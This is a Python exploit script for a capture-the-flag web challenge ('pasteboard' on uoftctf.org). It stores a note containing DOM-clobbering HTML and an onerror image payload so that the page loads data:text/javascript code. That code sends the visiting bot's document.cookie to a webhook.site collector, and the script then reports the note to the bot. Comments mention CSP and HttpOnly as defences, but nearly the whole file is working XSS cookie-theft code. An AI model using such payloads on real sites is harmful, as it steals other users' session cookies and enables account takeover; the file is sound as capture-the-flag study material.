import requests

# Challenge instance under test and the collector that receives the callback.
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# JavaScript placed inside a data:text/javascript URL. It only runs if the
# page loads that URL as a script source; the note markup cannot trigger it
# by itself.
# NOTE(review): whether the target page does so with the `path` value is the
# assumption being tested here -- the page's own script is not visible in this
# file.
# Defensive reading: a Content-Security-Policy whose script-src omits `data:`
# blocks this load, and a cookie marked HttpOnly is not exposed through
# document.cookie.
exfil_js = (
    "fetch('" + WEBHOOK + "?cookie='"
    "+encodeURIComponent(document.cookie)"
    "+'&loc='+encodeURIComponent(location.href))"
)
data_uri = "data:text/javascript," + exfil_js

# Note body: a form whose id/name pair shadows `errorReporter.path` in the DOM,
# followed by an image whose error handler sets window.lastRenderError and
# throws.
# NOTE(review): presumably the page's error handler reads errorReporter.path
# as a script location -- confirm against the challenge's client-side code.
# Sanitising the stored note body server-side removes both elements.
payload = "\n".join(
    [
        '<form id="errorReporter">',
        '<input name="path" value="' + data_uri + '">',
        "</form>",
        '''<img src=x onerror="window.lastRenderError='x';throw Error()">''',
    ]
)

for banner_line in (
    "[*] Testing data: URI with fetch inside...",
    "[*] Payload will load: data:text/javascript,fetch(...)",
    "",
):
    print(banner_line)

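# Create the note, then submit its path to the report endpoint so the
# challenge bot renders it. Every request carries a timeout so a stalled
# server cannot hang the run.
REQUEST_TIMEOUT = 10  # seconds; constructed value, adjust as needed

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Data URI Test", "body": payload},
    # Keep the 302 visible: its Location header carries the new note's path.
    allow_redirects=False,
    timeout=REQUEST_TIMEOUT,
)

# Read the header only on the expected redirect; a missing header would
# otherwise be formatted into the URL as the literal text "None".
location = resp.headers.get("Location") if resp.status_code == 302 else None

if resp.status_code != 302:
    print(f"[-] Failed: {resp.status_code}")
elif not location:
    print("[-] Failed: 302 response carried no Location header")
else:
    # NOTE(review): assumes Location is a site-relative path starting with
    # "/" -- an absolute URL here would produce a malformed note_url.
    note_url = f"{BASE_URL}{location}"

    print(f"[+] Created: {note_url}")
    print("[*] You can also test manually by visiting above URL")
    print()

    report = session.post(
        f"{BASE_URL}/report",
        data={"url": location},
        timeout=REQUEST_TIMEOUT,
    )

    # 202 is the only status this script treats as an accepted report.
    if report.status_code == 202:
        print("[+] Reported to bot!")
        print()
        print("[*] In 30-40 seconds, check webhook for:")
        print("    GET request with 'cookie' parameter")
        print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
        print()
        print("[*] If data: URI works, you'll see the flag in cookie parameter")
        print("[*] If not, we'll try a different approach")
    else:
        print(f"[-] Report failed: {report.status_code}")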
